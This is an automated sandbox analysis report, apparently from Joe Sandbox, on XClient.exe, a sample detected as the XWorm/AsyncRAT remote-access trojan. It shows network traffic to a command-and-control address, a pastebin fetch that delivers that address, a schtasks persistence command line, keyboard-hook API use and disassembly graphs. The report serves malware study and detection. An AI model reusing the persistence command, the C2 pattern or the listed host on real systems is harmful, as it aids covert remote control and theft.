                    Jan 3, 2025 14:10:50.648050070 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.652829885 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.662919044 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.667722940 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.725528955 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.730371952 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.741065979 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.745810032 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.826217890 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.828802109 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.833642960 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.920411110 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:50.921758890 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:50.926549911 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:51.013312101 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:51.015010118 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:51.019756079 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:51.106484890 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:51.107738018 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:51.112509012 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:55.069255114 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:55.074157000 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:55.246273041 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:55.248291016 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:55.253109932 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:55.942780972 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:56.147120953 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:56.325098038 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:56.325205088 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:59.116274118 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:59.121182919 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:59.308022022 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:10:59.337165117 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:10:59.342147112 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:11:00.694281101 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:11:00.699126005 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:11:00.870752096 CET70004973187.120.125.47192.168.2.4
                    Jan 3, 2025 14:11:00.871459961 CET497317000192.168.2.487.120.125.47
                    Jan 3, 2025 14:11:00.877003908 CET70004973187.120.125.47192.168.2.4

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Jan 3, 2025 14:07:00.551600933 CET5532553192.168.2.41.1.1.1
                    Jan 3, 2025 14:07:00.562392950 CET53553251.1.1.1192.168.2.4

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jan 3, 2025 14:07:00.551600933 CET192.168.2.41.1.1.10xd56dStandard query (0)pastebin.comA (IP address)IN (0x0001)false

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jan 3, 2025 14:07:00.562392950 CET1.1.1.1192.168.2.40xd56dNo error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                    Jan 3, 2025 14:07:00.562392950 CET1.1.1.1192.168.2.40xd56dNo error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                    Jan 3, 2025 14:07:00.562392950 CET1.1.1.1192.168.2.40xd56dNo error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false

                    HTTP Request Dependency Graph

                    • pastebin.com

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.449730172.67.19.244436884C:\Users\user\Desktop\XClient.exe
                    TimestampBytes transferredDirectionData
                    2025-01-03 13:07:01 UTC74OUTGET /raw/c8qJf1m5 HTTP/1.1
                    Host: pastebin.com
                    Connection: Keep-Alive
                    2025-01-03 13:07:01 UTC388INHTTP/1.1 200 OK
                    Date: Fri, 03 Jan 2025 13:07:01 GMT
                    Content-Type: text/plain; charset=utf-8
                    Transfer-Encoding: chunked
                    Connection: close
                    x-frame-options: DENY
                    x-content-type-options: nosniff
                    x-xss-protection: 1;mode=block
                    cache-control: public, max-age=1801
                    CF-Cache-Status: MISS
                    Last-Modified: Fri, 03 Jan 2025 13:07:01 GMT
                    Server: cloudflare
                    CF-RAY: 8fc3359c7ecb18b8-EWR
                    2025-01-03 13:07:01 UTC24INData Raw: 31 32 0d 0a 38 37 2e 31 32 30 2e 31 32 35 2e 34 37 3a 37 30 30 30 0d 0a
                    Data Ascii: 1287.120.125.47:7000
                    2025-01-03 13:07:01 UTC5INData Raw: 30 0d 0a 0d 0a
                    Data Ascii: 0


                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Target ID:0
                    Start time:08:06:54
                    Start date:03/01/2025
                    Path:C:\Users\user\Desktop\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Users\user\Desktop\XClient.exe"
                    Imagebase:0x210000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.1658447422.0000000000212000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.4114219369.00000000025CC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:false

                    General

                    Target ID:1
                    Start time:08:06:58
                    Start date:03/01/2025
                    Path:C:\Windows\System32\schtasks.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                    Imagebase:0x7ff76f990000
                    File size:235'008 bytes
                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:2
                    Start time:08:06:58
                    Start date:03/01/2025
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    General

                    Target ID:3
                    Start time:08:06:59
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0xaa0000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Joe Security
                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: Sekoia.io
                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\XClient.exe, Author: ditekSHen
                    Antivirus matches:
                    • Detection: 100%, Avira
                    • Detection: 100%, Joe Sandbox ML
                    • Detection: 74%, ReversingLabs
                    • Detection: 68%, Virustotal, Browse
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:7
                    Start time:08:08:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0x20000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:9
                    Start time:08:09:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0xf90000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    General

                    Target ID:10
                    Start time:08:10:00
                    Start date:03/01/2025
                    Path:C:\Users\user\AppData\Roaming\XClient.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Users\user\AppData\Roaming\XClient.exe
                    Imagebase:0x4d0000
                    File size:41'984 bytes
                    MD5 hash:2E525CCEBF9EDE7492931251EB66571A
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:low
                    Has exited:true

                    Disassembly

                    Reset < >

                      Execution Graph

                      Execution Coverage:15.8%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:3
                      Total number of Limit Nodes:0
                      execution_graph 5520 7ffd9b883a68 5522 7ffd9b883a71 SetWindowsHookExW 5520->5522 5523 7ffd9b883b41 5522->5523

                      Executed Functions

                      Function 00007FFD9B88CDF4 Relevance: 2.4, Strings: 1, Instructions: 1132COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 0 7ffd9b88cdf4-7ffd9b88ce00 call 7ffd9b8805e8 2 7ffd9b88ce05-7ffd9b88ce45 0->2 6 7ffd9b88ce47-7ffd9b88ce64 2->6 7 7ffd9b88cebb 2->7 8 7ffd9b88cec0-7ffd9b88ced5 6->8 10 7ffd9b88ce66-7ffd9b88ceb6 call 7ffd9b88b8d0 6->10 7->8 12 7ffd9b88ced7-7ffd9b88cee9 call 7ffd9b8805f8 8->12 13 7ffd9b88ceee-7ffd9b88cf03 8->13 30 7ffd9b88daf1-7ffd9b88daff 10->30 12->30 19 7ffd9b88cf35-7ffd9b88cf4a 13->19 20 7ffd9b88cf05-7ffd9b88cf30 13->20 27 7ffd9b88cf4c-7ffd9b88cf58 call 7ffd9b88bdc0 19->27 28 7ffd9b88cf5d-7ffd9b88cf72 19->28 20->30 27->30 35 7ffd9b88cfb8-7ffd9b88cfcd 28->35 36 7ffd9b88cf74-7ffd9b88cf77 28->36 41 7ffd9b88d00e-7ffd9b88d023 35->41 42 7ffd9b88cfcf-7ffd9b88cfd2 35->42 36->7 38 7ffd9b88cf7d-7ffd9b88cf88 36->38 38->7 39 7ffd9b88cf8e-7ffd9b88cfb3 call 7ffd9b8805d0 call 7ffd9b88bdc0 38->39 39->30 49 7ffd9b88d025-7ffd9b88d028 41->49 50 7ffd9b88d050-7ffd9b88d065 41->50 42->7 44 7ffd9b88cfd8-7ffd9b88cfe3 42->44 44->7 47 7ffd9b88cfe9-7ffd9b88d009 call 7ffd9b8805d0 call 7ffd9b8840b8 44->47 47->30 49->7 53 7ffd9b88d02e-7ffd9b88d04b call 7ffd9b8805d0 call 7ffd9b8840c0 49->53 58 7ffd9b88d06b-7ffd9b88d0b7 call 7ffd9b880558 50->58 59 7ffd9b88d13d-7ffd9b88d152 50->59 53->30 58->7 93 7ffd9b88d0bd-7ffd9b88d0f5 call 7ffd9b880858 58->93 67 7ffd9b88d171-7ffd9b88d186 59->67 68 7ffd9b88d154-7ffd9b88d157 59->68 77 7ffd9b88d1a8-7ffd9b88d1bd 67->77 78 7ffd9b88d188-7ffd9b88d18b 67->78 68->7 71 7ffd9b88d15d-7ffd9b88d16c call 7ffd9b884098 68->71 71->30 84 7ffd9b88d1dd-7ffd9b88d1f2 77->84 85 7ffd9b88d1bf-7ffd9b88d1d8 77->85 78->7 79 7ffd9b88d191-7ffd9b88d1a3 call 7ffd9b884098 78->79 79->30 91 7ffd9b88d212-7ffd9b88d227 84->91 92 7ffd9b88d1f4-7ffd9b88d20d 84->92 85->30 96 7ffd9b88d247-7ffd9b88d25c 91->96 97 7ffd9b88d229-7ffd9b88d242 91->97 92->30 93->7 114 7ffd9b88d0fb-7ffd9b88d138 call 7ffd9b88bdd0 93->114 102 7ffd9b88d285-7ffd9b88d29a 96->102 103 7ffd9b88d25e-7ffd9b88d261 96->103 97->30 110 7ffd9b88d33a-7ffd9b88d34f 102->110 111 7ffd9b88d2a0-7ffd9b88d2bb 102->111 103->7 105 7ffd9b88d267-7ffd9b88d280 103->105 105->30 117 7ffd9b88d367-7ffd9b88d37c 110->117 118 7ffd9b88d351-7ffd9b88d362 110->118 120 7ffd9b88d2bd-7ffd9b88d30e 111->120 121 7ffd9b88d30f-7ffd9b88d318 111->121 114->30 128 7ffd9b88d41c-7ffd9b88d431 117->128 129 7ffd9b88d382-7ffd9b88d39b 117->129 118->30 120->121 121->7 125 7ffd9b88d31e-7ffd9b88d335 121->125 125->30 138 7ffd9b88d449-7ffd9b88d45e 128->138 139 7ffd9b88d433-7ffd9b88d444 128->139 129->128 143 7ffd9b88d490-7ffd9b88d4a5 138->143 144 7ffd9b88d460-7ffd9b88d48b call 7ffd9b880b10 call 7ffd9b88b8d0 138->144 139->30 149 7ffd9b88d4ab-7ffd9b88d57d call 7ffd9b880b10 call 7ffd9b88b8d0 143->149 150 7ffd9b88d582-7ffd9b88d597 143->150 144->30 149->30 156 7ffd9b88d59d-7ffd9b88d5a0 150->156 157 7ffd9b88d65e-7ffd9b88d673 150->157 158 7ffd9b88d5a6-7ffd9b88d5b1 156->158 159 7ffd9b88d653-7ffd9b88d658 156->159 165 7ffd9b88d675-7ffd9b88d682 call 7ffd9b88b8d0 157->165 166 7ffd9b88d687-7ffd9b88d69c 157->166 158->159 161 7ffd9b88d5b7-7ffd9b88d651 call 7ffd9b880b10 call 7ffd9b88b8d0 158->161 169 7ffd9b88d659 159->169 161->169 165->30 174 7ffd9b88d69e-7ffd9b88d6af 166->174 175 7ffd9b88d713-7ffd9b88d728 166->175 169->30 174->7 181 7ffd9b88d6b5-7ffd9b88d6c5 call 7ffd9b8805c8 174->181 183 7ffd9b88d768-7ffd9b88d77d 175->183 184 7ffd9b88d72a-7ffd9b88d72d 175->184 194 7ffd9b88d6c7-7ffd9b88d6ec call 7ffd9b88b8d0 181->194 195 7ffd9b88d6f1-7ffd9b88d70e call 7ffd9b8805c8 call 7ffd9b8805d0 call 7ffd9b884070 181->195 192 7ffd9b88d77f-7ffd9b88d7be call 7ffd9b88b590 call 7ffd9b885368 call 7ffd9b884078 183->192 193 7ffd9b88d7c3-7ffd9b88d7d8 183->193 184->7 187 7ffd9b88d733-7ffd9b88d763 call 7ffd9b8805c0 call 7ffd9b8805d0 call 7ffd9b884070 184->187 187->30 192->30 209 7ffd9b88d878-7ffd9b88d88d 193->209 210 7ffd9b88d7de-7ffd9b88d873 call 7ffd9b880b10 call 7ffd9b88b8d0 193->210 194->30 195->30 209->30 230 7ffd9b88d893-7ffd9b88d89a 209->230 210->30 233 7ffd9b88d89c-7ffd9b88d8a6 call 7ffd9b88bde0 230->233 234 7ffd9b88d8ad-7ffd9b88d9c7 call 7ffd9b88bdf0 call 7ffd9b88be00 call 7ffd9b88be10 call 7ffd9b88be20 call 7ffd9b885208 call 7ffd9b88be30 call 7ffd9b88be00 call 7ffd9b88be10 230->234 233->234 281 7ffd9b88da38-7ffd9b88da47 234->281 282 7ffd9b88d9c9-7ffd9b88d9cd 234->282 283 7ffd9b88da4e-7ffd9b88daf0 call 7ffd9b880b10 call 7ffd9b8805d8 call 7ffd9b88b8d0 281->283 282->283 284 7ffd9b88d9cf-7ffd9b88da2e call 7ffd9b88be40 call 7ffd9b88be50 282->284 283->30 284->281
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID: 0-3916222277
                      • Opcode ID: ffe52e5f2479a655929fdfb20da64ce995ee1005573560dc6d11de75136cb4e2
                      • Instruction ID: aa11739422e0363d3083def3c475c0433adab0cf0a8486eca342088964888046
                      • Opcode Fuzzy Hash: ffe52e5f2479a655929fdfb20da64ce995ee1005573560dc6d11de75136cb4e2
                      • Instruction Fuzzy Hash: 01725620B1D90D4BEBA8FB6884A5A7972D2FF9C304F554579D02ED32E7DE38E8428741
                      Function 00007FFD9B8805B8 Relevance: 1.0, Instructions: 1000COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 469 7ffd9b8805b8-7ffd9b880cff 477 7ffd9b880d01-7ffd9b880d06 469->477 478 7ffd9b880d08-7ffd9b880d0c 469->478 479 7ffd9b880d0f-7ffd9b880d29 477->479 478->479 481 7ffd9b880d63-7ffd9b880da9 479->481 482 7ffd9b880d2b-7ffd9b880d5d 479->482 489 7ffd9b880d5f-7ffd9b880d61 482->489 490 7ffd9b880daa-7ffd9b880df0 482->490 489->481 489->482 495 7ffd9b8816e0 490->495 496 7ffd9b880df6-7ffd9b880f6b call 7ffd9b8804e0 * 10 call 7ffd9b8805f0 490->496 497 7ffd9b8816e5-7ffd9b88172c 495->497 546 7ffd9b880f74-7ffd9b880fe0 call 7ffd9b880358 call 7ffd9b880368 496->546 547 7ffd9b880f6d 496->547 557 7ffd9b880ff3-7ffd9b881003 546->557 558 7ffd9b880fe2-7ffd9b880fec 546->558 547->546 561 7ffd9b88102b-7ffd9b88104b 557->561 562 7ffd9b881005-7ffd9b881024 call 7ffd9b880358 557->562 558->557 568 7ffd9b88104d-7ffd9b881057 call 7ffd9b880378 561->568 569 7ffd9b88105c-7ffd9b8810c0 call 7ffd9b880730 561->569 562->561 568->569 579 7ffd9b881160-7ffd9b8811ee 569->579 580 7ffd9b8810c6-7ffd9b88115b 569->580 600 7ffd9b8811f5-7ffd9b8812ca call 7ffd9b8807a8 579->600 580->600 614 7ffd9b8812cc-7ffd9b8812ff 600->614 615 7ffd9b881318-7ffd9b88134b 600->615 614->615 622 7ffd9b881301-7ffd9b88130e 614->622 625 7ffd9b881370-7ffd9b8813a0 615->625 626 7ffd9b88134d-7ffd9b88136e 615->626 622->615 627 7ffd9b881310-7ffd9b881316 622->627 629 7ffd9b8813a8-7ffd9b8813df 625->629 626->629 627->615 635 7ffd9b881404-7ffd9b881434 629->635 636 7ffd9b8813e1-7ffd9b881402 629->636 638 7ffd9b88143c-7ffd9b8814fd call 7ffd9b880388 call 7ffd9b880490 635->638 636->638 638->497 650 7ffd9b881503-7ffd9b88154b 638->650 650->497 655 7ffd9b881551-7ffd9b88160e call 7ffd9b880590 650->655 671 7ffd9b881615-7ffd9b8816ae 655->671
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f1091a3df13a0a4a7615933bb4acefa3809ad35b89bf32639e52f15980538419
                      • Instruction ID: aaa06a9f5a53326c754fccaeda4ddce5b0ccd359c6a52d1e3ccff0cfdd992cfd
                      • Opcode Fuzzy Hash: f1091a3df13a0a4a7615933bb4acefa3809ad35b89bf32639e52f15980538419
                      • Instruction Fuzzy Hash: B2620861B29E094FE7A8FB6C9875679B6D2EF9C304F4505B9E01EC32DADD38A8018741
                      Function 00007FFD9B889566 Relevance: .5, Instructions: 472COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 682 7ffd9b889566-7ffd9b889573 683 7ffd9b889575-7ffd9b88957d 682->683 684 7ffd9b88957e-7ffd9b889647 682->684 683->684 688 7ffd9b889649-7ffd9b889652 684->688 689 7ffd9b8896b3 684->689 688->689 691 7ffd9b889654-7ffd9b889660 688->691 690 7ffd9b8896b5-7ffd9b8896da 689->690 698 7ffd9b889746 690->698 699 7ffd9b8896dc-7ffd9b8896e5 690->699 692 7ffd9b889699-7ffd9b8896b1 691->692 693 7ffd9b889662-7ffd9b889674 691->693 692->690 694 7ffd9b889676 693->694 695 7ffd9b889678-7ffd9b88968b 693->695 694->695 695->695 697 7ffd9b88968d-7ffd9b889695 695->697 697->692 700 7ffd9b889748-7ffd9b8897f0 698->700 699->698 701 7ffd9b8896e7-7ffd9b8896f3 699->701 712 7ffd9b88985e 700->712 713 7ffd9b8897f2-7ffd9b8897fc 700->713 702 7ffd9b8896f5-7ffd9b889707 701->702 703 7ffd9b88972c-7ffd9b889744 701->703 705 7ffd9b889709 702->705 706 7ffd9b88970b-7ffd9b88971e 702->706 703->700 705->706 706->706 708 7ffd9b889720-7ffd9b889728 706->708 708->703 714 7ffd9b889860-7ffd9b889889 712->714 713->712 715 7ffd9b8897fe-7ffd9b88980b 713->715 721 7ffd9b88988b-7ffd9b889896 714->721 722 7ffd9b8898f3 714->722 716 7ffd9b88980d-7ffd9b88981f 715->716 717 7ffd9b889844-7ffd9b88985c 715->717 719 7ffd9b889821 716->719 720 7ffd9b889823-7ffd9b889836 716->720 717->714 719->720 720->720 723 7ffd9b889838-7ffd9b889840 720->723 721->722 724 7ffd9b889898-7ffd9b8898a6 721->724 725 7ffd9b8898f5-7ffd9b889986 722->725 723->717 726 7ffd9b8898a8-7ffd9b8898ba 724->726 727 7ffd9b8898df-7ffd9b8898f1 724->727 733 7ffd9b88998c-7ffd9b88999b 725->733 728 7ffd9b8898bc 726->728 729 7ffd9b8898be-7ffd9b8898d1 726->729 727->725 728->729 729->729 731 7ffd9b8898d3-7ffd9b8898db 729->731 731->727 734 7ffd9b88999d 733->734 735 7ffd9b8899a3-7ffd9b889a08 call 7ffd9b889a24 733->735 734->735 742 7ffd9b889a0a 735->742 743 7ffd9b889a0f-7ffd9b889a23 735->743 742->743
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ecf8e0c694c1ffb6754ec79f74f7a6b775c6d699c01082e3ab193f780616137e
                      • Instruction ID: 92e30c0a7313f81627621525b669462281174a6a3975323d0fb80dcb854cb07e
                      • Opcode Fuzzy Hash: ecf8e0c694c1ffb6754ec79f74f7a6b775c6d699c01082e3ab193f780616137e
                      • Instruction Fuzzy Hash: DDF1D530A09E4E8FEBA8DF68D8597E937D1FF58310F04466EE85DC7295DB3499408B82
                      Function 00007FFD9B88A312 Relevance: .5, Instructions: 458COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 744 7ffd9b88a312-7ffd9b88a31f 745 7ffd9b88a32a-7ffd9b88a3f7 744->745 746 7ffd9b88a321-7ffd9b88a329 744->746 750 7ffd9b88a3f9-7ffd9b88a402 745->750 751 7ffd9b88a463 745->751 746->745 750->751 752 7ffd9b88a404-7ffd9b88a410 750->752 753 7ffd9b88a465-7ffd9b88a48a 751->753 754 7ffd9b88a449-7ffd9b88a461 752->754 755 7ffd9b88a412-7ffd9b88a424 752->755 760 7ffd9b88a4f6 753->760 761 7ffd9b88a48c-7ffd9b88a495 753->761 754->753 756 7ffd9b88a426 755->756 757 7ffd9b88a428-7ffd9b88a43b 755->757 756->757 757->757 759 7ffd9b88a43d-7ffd9b88a445 757->759 759->754 762 7ffd9b88a4f8-7ffd9b88a51d 760->762 761->760 763 7ffd9b88a497-7ffd9b88a4a3 761->763 770 7ffd9b88a58b 762->770 771 7ffd9b88a51f-7ffd9b88a529 762->771 764 7ffd9b88a4a5-7ffd9b88a4b7 763->764 765 7ffd9b88a4dc-7ffd9b88a4f4 763->765 766 7ffd9b88a4b9 764->766 767 7ffd9b88a4bb-7ffd9b88a4ce 764->767 765->762 766->767 767->767 769 7ffd9b88a4d0-7ffd9b88a4d8 767->769 769->765 772 7ffd9b88a58d-7ffd9b88a5bb 770->772 771->770 773 7ffd9b88a52b-7ffd9b88a538 771->773 779 7ffd9b88a62b 772->779 780 7ffd9b88a5bd-7ffd9b88a5c8 772->780 774 7ffd9b88a53a-7ffd9b88a54c 773->774 775 7ffd9b88a571-7ffd9b88a589 773->775 777 7ffd9b88a54e 774->777 778 7ffd9b88a550-7ffd9b88a563 774->778 775->772 777->778 778->778 781 7ffd9b88a565-7ffd9b88a56d 778->781 783 7ffd9b88a62d-7ffd9b88a705 779->783 780->779 782 7ffd9b88a5ca-7ffd9b88a5d8 780->782 781->775 784 7ffd9b88a5da-7ffd9b88a5ec 782->784 785 7ffd9b88a611-7ffd9b88a629 782->785 793 7ffd9b88a70b-7ffd9b88a71a 783->793 786 7ffd9b88a5ee 784->786 787 7ffd9b88a5f0-7ffd9b88a603 784->787 785->783 786->787 787->787 789 7ffd9b88a605-7ffd9b88a60d 787->789 789->785 794 7ffd9b88a71c 793->794 795 7ffd9b88a722-7ffd9b88a784 call 7ffd9b88a7a0 793->795 794->795 802 7ffd9b88a786 795->802 803 7ffd9b88a78b-7ffd9b88a79f 795->803 802->803
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: eea038dee7154fe83a996e98f1d2498ba9a2c9d4ef72795975248779aa02d983
                      • Instruction ID: cddeee9447933508adc4bde2bba0099ed1f125d0876ade73fbda20aa3cb4bd14
                      • Opcode Fuzzy Hash: eea038dee7154fe83a996e98f1d2498ba9a2c9d4ef72795975248779aa02d983
                      • Instruction Fuzzy Hash: C6E1E430A09E4D8FEBA8DF68C8557E977D1FF58310F04426ED85DC72E5DA78A9408B82
                      Function 00007FFD9B883A68 Relevance: 1.6, APIs: 1, Instructions: 141COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 375 7ffd9b883a68-7ffd9b883a6f 376 7ffd9b883a71-7ffd9b883a79 375->376 377 7ffd9b883a7a-7ffd9b883aed 375->377 376->377 381 7ffd9b883af3-7ffd9b883b00 377->381 382 7ffd9b883b79-7ffd9b883b7d 377->382 383 7ffd9b883b02-7ffd9b883b3f SetWindowsHookExW 381->383 382->383 385 7ffd9b883b41 383->385 386 7ffd9b883b47-7ffd9b883b78 383->386 385->386
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4117209297.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_7ffd9b880000_XClient.jbxd
                      Similarity
                      • API ID: HookWindows
                      • String ID:
                      • API String ID: 2559412058-0
                      • Opcode ID: 2175d6044e1fabf81b224838e98d95c9f498410c5805a52f98df7858fff6b2de
                      • Instruction ID: feeb6b7f23be814906d4a99e2977da148b147fc4348afcce3ba79c10c0942c38
                      • Opcode Fuzzy Hash: 2175d6044e1fabf81b224838e98d95c9f498410c5805a52f98df7858fff6b2de
                      • Instruction Fuzzy Hash: A341E730A0CE4D4FDB1CEB6C98566F9BBE1EF59321F00427EE059C3192DA75A81287C1

                      Executed Functions

                      Function 00007FFD9B8B0C5E Relevance: 1.0, Instructions: 1021COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000003.00000002.1748458560.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_3_2_7ffd9b8b0000_XClient.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 43aeb10d008f66eb15092c04babc2d5a105de5692c8ef57a111f213e9cdeb5f7
                      • Instruction ID: ee1f97d7edcd8b4fa0df03994319b840e6e2ab9664defab6baaf6c08026ec59c
